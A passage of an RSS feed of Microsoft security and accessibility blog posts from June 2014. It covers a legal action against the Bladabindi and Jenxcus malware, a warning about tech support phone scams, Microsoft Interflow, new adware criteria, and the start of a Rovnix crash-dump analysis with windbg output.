different from the previous botnets we have seen. A traditional botnet usually has one command-and-control (CNC) server to control all infected machines. In the case of Bladabinda and Jenxcus there can be a syndicate of botnets and thousands of botnet herders.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/DCU6.png"><img alt="CnC communication" src="http://www.microsoft.com/security/portal/blog-images/a/DCU6.png" border="0" /></a>&nbsp;</p> <p><em>Figure 6: The communication method of the CNC and the infected system</em></p> <p>Microsoft added <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/14/msrt-january-2014-bladabindi.aspx">Bladabindi to the Malicious Software Removal Tool</a> in January 2014.&nbsp;<a href="http://blogs.technet.com/b/mmpc/archive/2014/02/11/msrt-february-2014-jenxcus.aspx">Jenxcus was added to the MSRT</a> in February 2014. However, with aggressive infection and distribution methods, the malware authors and the distribution system behind them have continued to affect thousands of Microsoft customers every day.</p> <p>Anyone concerned that their computer is infected with malware should follow the guidance available from the <a href="http://support.microsoft.com/gp/cu_sc_virsec_master">Microsoft Support Virus and Security Center</a>. To help stay protected we also recommend you to install an up-to-date, real-time protection security product such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>.</p> <p><em>Tanmay Ganacharya and Francis Tan Seng</em></p> <p><em>MMPC</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3633758&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Microsoft Takes Legal Action to fight Malware: Bladabindi and Jenxcushttp://blogs.technet.com/b/security/archive/2014/06/30/microsoft-takes-legal-action-to-fight-malware-bladabindi-and-jenxcus.aspxMon, 30 Jun 2014 19:30:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:2819d574-260e-4cd1-a2c5-89eb94b614c4Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3633768http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3633768http://blogs.technet.com/b/security/archive/2014/06/30/microsoft-takes-legal-action-to-fight-malware-bladabindi-and-jenxcus.aspx#comments<p>Today, Microsoft filed a civil suit against a Dynamic DNS provider in the U.S. (Vitalwerks Internet Solutions, LLC (doing business as No-IP.com) and identified two individuals who are believed to have used this DNS provider to spread and control dangerous malware (Bladabindi and Jenxcus) to unsuspecting victims. Bladabindi or Jenxcus was <a href="http://www.microsoft.com/security/sir/glossary.aspx#E">encountered</a> more than 7.4 million times over the&nbsp;past twelve months worldwide.</p> <p>The two people identified allegedly&nbsp;used social media to flaunt their creation and the dissemination of two well-known types of malware, known by the <a href="http://www.microsoft.com/security/portal/mmpc/default.aspx">Microsoft Malware Protection Center </a>(MMPC) as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/search.aspx?query=jenxcus">Jenxcus</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/search.aspx?query=bladabindi">Bladabindi</a>.&nbsp;<a href="/b/security/archive/2014/06/30/microsoft-takes-legal-action-to-fight-malware-bladabindi-and-jenxcus.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/30/microsoft-takes-legal-action-to-fight-malware-bladabindi-and-jenxcus.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3633768&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">DNSDigital Crimes UnitJenxcuslegal actionVitalwerksNo-IP.comBaladabindi Texas Wins FCC Award for Its New Tools That Help People Create Accessible Microsoft Materialshttp://blogs.msdn.com/b/accessibility/archive/2014/06/26/texas-wins-fcc-award-for-its-new-tools-that-help-people-create-accessible-microsoft-materials.aspxThu, 26 Jun 2014 21:13:06 GMT91d46819-8472-40ad-a661-2c78acb4018c:10537722Daniel Hubbell - MSFT1http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10537722http://blogs.msdn.com/b/accessibility/archive/2014/06/26/texas-wins-fcc-award-for-its-new-tools-that-help-people-create-accessible-microsoft-materials.aspx#commentsThe Texas state government won a national award earlier this month for its new web-based tools that help people create accessible Microsoft 2010 materials, everything from Word documents to PowerPoint demonstrations. Texas won one of the Federal Communication...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/26/texas-wins-fcc-award-for-its-new-tools-that-help-people-create-accessible-microsoft-materials.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10537722" width="1" height="1"> Is that call from Microsoft a scam?http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/26/is-that-call-from-microsoft-a-scam.aspxThu, 26 Jun 2014 15:46:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10536594Eve Blakemore77http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10536594http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/26/is-that-call-from-microsoft-a-scam.aspx#comments<p>A reader writes:</p> <p><em>I received a call from someone who claimed that my computer had been identified by Microsoft as vulnerable. I thought it sounded fake, and I told them that I had no way to know if they were who they said they were. Then they said they could prove that they were from Microsoft by giving me my serial number if I would go to a website called www.ammyy.com.</em></p> <p><em>Is this call a scam?</em></p> <p>Yes. This is a scam. This is not a legitimate call from Microsoft. Neither Microsoft nor our partners make unsolicited phone calls (also known as cold calls) about your computer security or software fixes.</p> <h1>If you receive a call like this one, it&rsquo;s a scam, and all you need to do is hang up.</h1> <p>Cybercriminals often use publicly available phone directories, so they might know your name and other personal information when they call you. They might even guess what operating system you're using. It&rsquo;s still a scam.</p> <h1>Don&rsquo;t let scammers encourage you to install dangerous software</h1> <p>Once cybercriminals gain your trust, they might ask for your user name and password or ask you to go to a legitimate website (such as www.ammyy.com) to install software that will let them access your computer to fix it. Once you do this, your computer and your personal information are vulnerable.</p> <p><strong>Do not trust unsolicited calls. Do not provide any personal information.</strong></p> <p>Although law enforcement can trace phone numbers, perpetrators often use pay phones, disposable cellular phones, or stolen cellular phone numbers. It's better to avoid being conned rather than try to repair the damage afterwards.</p> <p>For more information, see <a href="http://www.microsoft.com/security/online-privacy/avoid-phone-scams.aspx">Avoid tech support phone scams</a>.</p> <h1>I think I might have already fallen for this scam</h1> <p>If you think you might be a victim of fraud, you can report it. For more information, see&nbsp;<a href="http://www.microsoft.com/security/online-privacy/phishing-scams.aspx#Victim">What to do if you think you have been a victim of a scam</a>.</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10536594" width="1" height="1"> Antifragility – the goal for high-performance IT organizationshttp://blogs.technet.com/b/trustworthycomputing/archive/2014/06/25/antifragility-the-goal-for-high-performance-it-organizations.aspxWed, 25 Jun 2014 15:26:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:4c31fbfc-78c4-4990-9f6b-e319b595165cTrusted Cloud Team0<p><strong>David Bills, Chief Reliability Strategist, Microsoft</strong></p> <p>In a<a href="/b/trustworthycomputing/archive/2014/06/18/my-desert-island-half-dozen-recommended-reading-for-resilience.aspx" target="_blank"> recent post</a>, I shared a short list of my favorite books and articles, related to reliability. Each one has influenced my thinking with respect to how to go about creating a high-performing IT organization, despite the fact not all of these publications are IT-centric in terms of subject matter. In this post, I&rsquo;m going to take a closer look at &ldquo;<a href="http://en.wikipedia.org/wiki/Antifragile:_Things_That_Gain_from_Disorder" target="_blank">Antifragile</a>&rdquo;, the 2012 book written by Nassim Nicholas Taleb, and describe why I think the concept of antifragility is particularly applicable to cloud computing. <a href="/b/trustworthycomputing/archive/2014/06/25/antifragility-the-goal-for-high-performance-it-organizations.aspx" target="_blank"><span style="color:#0066dd;">See more &gt;&gt;</span></a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/25/antifragility-the-goal-for-high-performance-it-organizations.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3633519&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">ReliableCloudReliabilityDavid BillsantifragileCloud Computingcloud servicesantifragility Don’t forget to update all softwarehttp://blogs.msdn.com/b/securitytipstalk/archive/2014/06/24/don-t-forget-to-update-all-software.aspxTue, 24 Jun 2014 15:27:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10536120Eve Blakemore15http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10536120http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/24/don-t-forget-to-update-all-software.aspx#comments<p>If you&rsquo;re signed up for automatic updating (and we hope that you are), you&rsquo;ll get all the security updates for your operating system and other Microsoft software such as Internet Explorer, Microsoft Word, Windows Defender, Microsoft Security Essentials, Microsoft Excel, and more.</p> <p><strong>Note:</strong> If you have a Windows Phone, you can <a href="http://www.windowsphone.com/en-us/how-to/wp8/basics/how-do-i-update-my-phone-software">adjust the settings to get automatic updates</a>.</p> <h1>What about non-Microsoft software?</h1> <p>To help keep your computer secure and running smoothly, you&rsquo;ll need to update not just your Microsoft software, but all of your other software too. That includes software that came with your computer, as well as apps, programs, and other software that you downloaded yourself.</p> <p>Most &nbsp;software should:</p> <ul> <li>Update itself automatically, or</li> <li>Notify you when an update is available so that you can decide whether you want to install it.</li> </ul> <p>It&rsquo;s a good idea to go through all your software and look for a &ldquo;Check for updates&rdquo; option in one of the menus. For example, you can update Adobe Reader by going to <strong>Help</strong> &gt; <strong>Check for updates</strong>.</p> <p><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Learn more about how to get security updates automatically</a> and find out <a href="http://www.microsoft.com/security/pc-security/troubleshoot-updates.aspx">what to do if your updates don&rsquo;t install</a>.</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10536120" width="1" height="1">updatesautomatic updatingAutomatic UpdatesWindows Updatethird-party software How Vulnerabilities are Exploited: the Root Causes of Exploited Remote Code Execution CVEshttp://blogs.technet.com/b/security/archive/2014/06/24/how-vulnerabilities-are-exploited-the-root-causes-of-exploited-remote-code-execution-cves.aspxTue, 24 Jun 2014 08:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:a1646e3d-9b28-4b7f-892e-f050bc1cd9fdTim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3633376http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3633376http://blogs.technet.com/b/security/archive/2014/06/24/how-vulnerabilities-are-exploited-the-root-causes-of-exploited-remote-code-execution-cves.aspx#comments<p>It is impossible to completely prevent vulnerabilities from being introduced during the development of large-scale software projects. As long as human beings write software code, mistakes that lead to imperfections in software will be made &ndash; no software is perfect. Some imperfections simply prevent the software from functioning exactly as intended, but other bugs may present vulnerabilities.</p> <p>Manual code reviews performed by developers and testers, in concert with automated tools such as fuzzers and static analysis tools, are very helpful techniques for identifying vulnerabilities in code. But these techniques cannot find every vulnerability in large scale software projects. As developers build more functionality into their software, their code becomes more and more complex. The challenge of finding vulnerabilities in very complex code is compounded by the fact that there are an infinite number of ways that developers can make coding errors that can create vulnerabilities, some of which are very, very subtle.</p> <p>Have you ever wondered what a vulnerability looks like? To illustrate how subtle a security vulnerability can be, the following small code sample contains a vulnerability that is difficult to find using code reviews or tools or both. <a href="/b/security/archive/2014/06/26/how-vulnerabilities-are-exploited-the-root-causes-of-exploited-remote-code-execution-cves.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/24/how-vulnerabilities-are-exploited-the-root-causes-of-exploited-remote-code-execution-cves.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3633376&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Remote Code ExecutionVulnerabilitiesMicrosoft Security Intelligence Report Volume 16RCESecurity MitigationsSIRv16exploits Adware changes – One week to gohttp://blogs.technet.com/b/mmpc/archive/2014/06/23/adware-changes-one-week-to-go.aspxMon, 23 Jun 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:8067d473-1df0-4404-9933-6012af4219cdmsft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/06/23/adware-changes-one-week-to-go.aspx#comments<div class="ExternalClass3ECEF14C0CC845738A2372FD5484C1D3"> <p>​A quick note to all of developers out there. You have until 1 July to let us know if you think your software shouldn&rsquo;t be detected under our new adware criteria.</p> <p>A few months ago I announced some major changes to how we at the Microsoft Malware Protection Center assess adware in my blog <a href="http://blogs.technet.com/b/mmpc/archive/2014/04/03/adware-a-new-approach.aspx">Adware: A new approach</a>.</p> <p>As a reminder, <a href="http://www.microsoft.com/security/portal/mmpc/shared/ObjectiveCriteria.aspx">the&nbsp;updated criteria</a> defines adware as:</p> <p><em>Programs that promote a product or service outside of their own program can interfere with your computing experience. You should have clear choice and control when installing programs that open advertisements.</em></p> <p><em>The advertisements that are opened by these programs must:</em></p> <ul> <li> <div><em>Include an obvious way to close the ad.</em></div> </li> <li> <div><em>Include the name of the program that created the ad.</em></div> </li> </ul> <em></em> <p><em>The program that creates these advertisements must:</em></p> <ul> <li> <div><em>Provide a standard uninstall method for the program using the same name as shown in the ads it produces.</em></div> </li> </ul> <p>On 1 July, 2014 we will change the way our products behave when they detect adware. The programs that we still detect, and their supporting files, will be removed by default.</p> <p>This means that you have about a week to let us know if you think your program shouldn&rsquo;t be detected.</p> <p>You can let us know through our <a href="http://www.microsoft.com/security/portal/developer/contactus.aspx">developer contact form</a>.</p> <p><em>Michael Johnson</em><br /><em>MMPC</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3633331&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Microsoft Interflow: a new Security and Threat Information Exchange Platformhttp://blogs.technet.com/b/security/archive/2014/06/23/microsoft-interflow-a-new-security-and-threat-information-exchange-platform.aspxMon, 23 Jun 2014 12:36:58 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:4e3592e9-37b3-4a60-a8cf-4a127a726abeTim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3633336http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3633336http://blogs.technet.com/b/security/archive/2014/06/23/microsoft-interflow-a-new-security-and-threat-information-exchange-platform.aspx#comments<p>Today, the Microsoft Security Response Center (MSRC) announced the private preview of <a href="http://www.microsoft.com/interflow">Microsoft Interflow</a>. This is a security and threat information exchange platform for cybersecurity analysts and researchers.</p> <p>Interflow provides an automated machine-readable feed of threat and security information that can be shared across industries and community groups in near real-time. This platform provides this information using open specifications <a href="http://stix.mitre.org/">STIX&trade; (Structured Threat Information eXpression), </a><a href="http://taxii.mitre.org/">TAXII&trade; (Trusted Automated eXchange of Indicator Information), </a>and<a href="http://cybox.mitre.org/"> CybOX&trade; (Cyber Observable eXpression standards). </a>This enables Interflow to integrate with existing operational and analytical tools that many organizations use through a plug-in architecture. It has the potential to help reduce the cost of defense by automating processes that are currently performed manually.&nbsp;</p> <p>You can get more information on Microsoft Interflow on the <a href="/b/msrc/archive/2014/06/23/announcing-microsoft-interflow.aspx">MSRC blog</a>, and as well as in this <a href="http://technet.microsoft.com/en-us/security/dn726547">FAQ</a> and at <a href="http://www.microsoft.com/interflow">www.microsoft.com/interflow</a>.</p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/23/microsoft-interflow-a-new-security-and-threat-information-exchange-platform.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3633336&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">CybOXMicrosoft InterflowSTIXInformation Exchange Driving a Collectively Stronger Security Community with Microsoft Interflowhttp://blogs.technet.com/b/msrc/archive/2014/06/23/announcing-microsoft-interflow.aspxMon, 23 Jun 2014 12:30:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:8357a392-32da-4cff-a6d6-cac76d55ec3eMSRC Team0<p>Today, Microsoft is pleased to announce the private preview of <a href="http://www.microsoft.com/interflow">Microsoft Interflow</a>, a security and threat information exchange platform for analysts and researchers working in cybersecurity. Interflow uses industry specifications to create an automated, machine-readable feed of threat and security information that can be shared across industries and groups in near real-time. The goal of the platform is to help security professionals respond more quickly to threats. It will also help reduce cost of defense by automating processes that are currently performed manually.&nbsp;</p> <p>Microsoft&rsquo;s ongoing active collaboration with the cybersecurity community has been a constant source of ideas and innovation for more than a decade. The Microsoft Active Protections Program (<a href="http://technet.microsoft.com/en-us/security/dn467918">MAPP</a>) was established in 2008 to provide security software providers with early access to software vulnerability information. Along the same lines, the inspiration for Interflow comes from the community. Today, data exchange difficulties &ndash; format mismatches, governance issues, and the complexity of data correlation &ndash; stand in the way of a more efficient incident response industry. Zheng Bu, VP of Security Research at FireEye, stated &ldquo;what the cybersecurity community will benefit from is a more productive way to collaborate and take action. It is encouraging to see Microsoft invest in such a platform, and drive it forward for the greater good of the community.&rdquo;</p> <p>A collectively stronger cybersecurity ecosystem means better protection for consumers and businesses. There are many examples of alliances across industries, such as those established in the education and finance sectors. Recently, a similar <a href="http://www.rila.org/news/topnews/Pages/RetailersLaunchComprehensiveCyberIntelligenceSharingCenter.aspx">cybersecurity alliance was formed in the retail industry</a>. As retailers and others share threat indicators and take action rapidly, cyberattacks are either prevented, or their damage and spread are minimized. Interflow enables exactly this type of community and peer-based sharing, whether the communities are formed by the Computer Emergency Response Teams (CERTs) across the globe or by industry.</p> <p>One may ask what exactly it means to share security and threat information using Interflow. The answer is simple: Interflow is a distributed system where users decide what communities to form, what data feeds to bring to their communities, and with whom to share data feeds. In addition, the use of open specifications <a href="http://stix.mitre.org/">STIX&trade; (Structured Threat Information eXpression)</a>, <a href="http://taxii.mitre.org/">TAXII&trade; (Trusted Automated eXchange of Indicator Information)</a>, and <a href="http://cybox.mitre.org/">CybOX&trade; (Cyber Observable eXpression standards)</a> means that Interflow can integrate with existing operational and analytical tools through a plug-in architecture. This means there is no lock-in to proprietary data formats, appliances or subscriptions, all of which raise the cost of cybersecurity.</p> <p>For many operating in the response community, reducing and managing the cost of defense in the face of exponentially increasing threat data is crucial. Running on Microsoft Azure public cloud, Interflow helps to reduce the cost of security infrastructure while allowing for rapid scale-out, a key premise of cloud computing. As Interflow automates the input and flow of security and threat data, organizations are able to prioritize analysis and action through customized watch lists, instead of bearing the cost of manual data compilation.</p> <p>As early users of Interflow, various network security teams at Microsoft have experienced these kinds of benefits. Microsoft is planning to share the security and threat data used to protect our own products and services with the Interflow communities during the private preview. Organizations and enterprises with dedicated security incident response teams can inquire about the private preview through their Technical Account Managers or by emailing <a href="mailto:mappbeta@microsoft.com">mappbeta@microsoft.com</a>. Microsoft plans to make Interflow available to all members of MAPP in the future.</p> <p>I said in the beginning that the cybersecurity community was the inspiration for Interflow. We look forward to working with the community to shape the roadmap forward. Today&rsquo;s announcement is timed with the 26<sup>th</sup> annual <a href="http://www.first.org/conference/2014">FIRST Conference</a> in Boston, Massachusetts.&nbsp; Attendees at the conference can stop by the Microsoft booth #8, observe a demo and discuss participation in the private preview of Interflow.</p> <p>Finally, you can find answers to most commonly asked questions <a href="http://technet.microsoft.com/en-us/security/dn727293">here</a>, and learn how Interflow enables a collectively stronger cybersecurity community at <a href="http://www.microsoft.com/interflow">www.microsoft.com/interflow</a>.</p> <p>Thanks,</p> <p>Jerry Bryant<a href="http://blogs.technet.com/b/msrc/about.aspx#Chris_Betz"></a><br /> Lead Senior Security Strategist, Microsoft Security Response Center (MSRC)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3632814&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">InterflowAnnouncements Do you know what your children are doing online?http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/20/safer-families.aspxFri, 20 Jun 2014 17:44:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10536113Kim Sanchez, Director of Trustworthy Computing0http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10536113http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/20/safer-families.aspx#comments<p>This week in the UK, Microsoft launches the <a href="http://www.microsoft.com/en-gb/about/family-safety/safer-families">Safer Families program</a> for parents to help their kids stay safer online.</p> <p>According to recent Microsoft research*:</p> <ul> <li>98 percent of UK parents with children at home agree that protecting their children online is necessary, yet almost 50 percent have not used the family safety settings or functions on the devices their children use.</li> <li>Of these, 50 percent don&rsquo;t know how to do so, and 50 percent know how, but just haven&rsquo;t done it yet.</li> </ul> <p>*The survey interviewed 1000 parents in the UK with children at home aged 5-16 years. &nbsp;</p> <p>So what can parents do?&nbsp;</p> <p>Microsoft makes it easy by providing <a href="http://www.microsoft.com/security/family-safety/settings.aspx">parental controls</a> that are built into its products and services. The new Safer Families program is designed to help parents remove the feeling of &rdquo;parental tech paralysis&rdquo; and switch on safety settings on your Microsoft technology and devices at home.</p> <p>Learn more about the <a href="http://www.microsoft.com/en-gb/about/family-safety/safer-families">Safer Families</a> program and how to turn on parental controls on your Microsoft devices.</p> <p><iframe src="http://www.youtube.com/embed/1EVNJnbrtOc" frameborder="0" width="640" height="390"></iframe></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10536113" width="1" height="1">parental controlschild safetyfamilycybersafetycyberbullyingMicrosoftXboxSafer FamiliesMicrosoft UK Security, compliance help fuel Los Angeles County’s O365 migration http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/19/security-compliance-help-fuel-los-angeles-county-s-o365-migration.aspxThu, 19 Jun 2014 16:05:26 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:a8740e99-a043-466b-8c65-2443f7475b8eTrusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong><br /><br />At Microsoft, we often talk about the investments we&rsquo;ve made in trustworthy cloud services. But there&rsquo;s nothing more encouraging than hearing from customers who recognize and benefit from those investments.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/06/19/security-compliance-help-fuel-los-angeles-county-s-o365-migration.aspx">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/19/security-compliance-help-fuel-los-angeles-county-s-o365-migration.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3633171&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">cloud securityCustomersAdrienne HallCloudOffice 365Trustcustomer perspectiveTechnologySecurityCloud Computingcloud servicesMicrosoftDataPrivacyMicrosoft Cloud Solutions New Product Allows People to Manage a Wheelchair and Other Devices with One Controllerhttp://blogs.msdn.com/b/accessibility/archive/2014/06/19/new-product-allows-people-to-manage-a-wheelchair-and-other-devices-with-one-controller.aspxThu, 19 Jun 2014 15:12:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10534182Daniel Hubbell - MSFT2http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10534182http://blogs.msdn.com/b/accessibility/archive/2014/06/19/new-product-allows-people-to-manage-a-wheelchair-and-other-devices-with-one-controller.aspx#commentsPeople in electric wheelchairs can now make calls, text and generally use many Bluetooth-enabled devices through one wheelchair controller, Medgadget reports . With the interface, someone could use a device that drives a wheelchair to control a range...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/19/new-product-allows-people-to-manage-a-wheelchair-and-other-devices-with-one-controller.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10534182" width="1" height="1"> My “Desert Island Half-Dozen” – recommended reading for resiliencehttp://blogs.technet.com/b/trustworthycomputing/archive/2014/06/18/my-desert-island-half-dozen-recommended-reading-for-resilience.aspxWed, 18 Jun 2014 20:49:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:a5922a1b-dd11-4180-be43-ff88eb75a937Trusted Cloud Team0<p><strong>By David Bills, chief reliability strategist, Microsoft</strong></p> <p>When I speak with customers, they often ask how they can successfully change the culture of their IT organization when deciding to implement a resilience engineering practice. Over the past decade I&rsquo;ve collected a number of books and articles which I have found to be helpful in this regard, and I often recommend these resources to customers. I&rsquo;ve included my favorites below, in no particular order, with a short explanation of why I&rsquo;m recommending them.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/06/18/my-desert-island-half-dozen-recommended-reading-for-resilience.aspx">See more&gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/18/my-desert-island-half-dozen-recommended-reading-for-resilience.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3633117&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicesCustomersCloudReliabilityCIOstrusted online experiencesBig Dataprivacy and reliabilitycustomer perspectiveITTechnologyExpert OpinionsProcessesCloud Computingdata centerscloud servicesTrustworthy ComputingMicrosoftInformation SecurityMicrosoft Cloud SolutionsIT Pros “Your fault - core dumped”- Diving into the BSOD caused by Rovnixhttp://blogs.technet.com/b/mmpc/archive/2014/06/18/your-fault-core-dumped-diving-into-the-bsod-caused-by-rovnix.aspxWed, 18 Jun 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:b8408e31-1911-4fc3-8cc1-525289d809f3msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/06/18/your-fault-core-dumped-diving-into-the-bsod-caused-by-rovnix.aspx#comments<div class="ExternalClass68292F33AA254F5BA400EB352B71C492"> <p>Recently we have noticed some <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/search.aspx?query=Rovnix">Win32/Rovnix</a> samples (detected as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDropper:Win32/Rovnix.K">TrojanDropper:Win32/Rovnix.K</a>) causing the BSOD on Windows 7 machines. We spent some time investigating this situation and discovered an interesting story behind the BSOD.</p> <p><strong>Analyzing the crash dump</strong></p> <p>We first saw TrojanDropper:Win32/Rovnix.K in October 2013. During a normal Windows Boot the malware will cause the BSOD.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/BSOD1.png"> <img width="500" alt="The BSOD" src="http://www.microsoft.com/security/portal/blog-images/a/BSOD1.png" border="0" /></a>&nbsp;</p> <p><em>Figure 1: Rovix BSOD screenshot</em></p> <p>To start, let&rsquo;s analyze the crash dump using windbg:&nbsp;</p> <blockquote style="margin-right:0px;" dir="ltr"> <p><br />kd&gt; !analyze -v</p> <p>*******************************************************************************<br />*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *<br />*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Bugcheck Analysis&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *<br />*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *<br />*******************************************************************************</p> <p>ATTEMPTED_WRITE_TO_READONLY_MEMORY (be)<br />An attempt was made to write to read only memory.&nbsp; The guilty driver is on the<br />stack trace (and is typically the current instruction pointer).<br />When possible, the guilty driver&#39;s name (Unicode string) is printed on<br />the bugcheck screen and saved in KiBugCheckDriver.<br />Arguments:<br />Arg1: 867bf4b1, Virtual address for the attempted write.<br />Arg2: 02f72121, PTE contents.<br />Arg3: 8a733c44, (reserved)<br />Arg4: 0000000b, (reserved)</p> </blockquote> <p>As shown above, the BSOD is caused by writing to a read-only memory address (0x867bf4b1).</p> <p>We can then use the&nbsp; .trap command to get further information.</p> <blockquote style="margin-right:0px;" dir="ltr"> <p>kd&gt; .trap 0xffffffff8a733c44<br />ErrCode = 00000003<br />eax=00000000 ebx=00000000 ecx=867bf4b1 edx=80ba6848 esi=80ba5a2e edi=80ba6876<br />eip=80b9be24 esp=8a733cb8 ebp=8a733cd4 iopl=0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; nv up ei 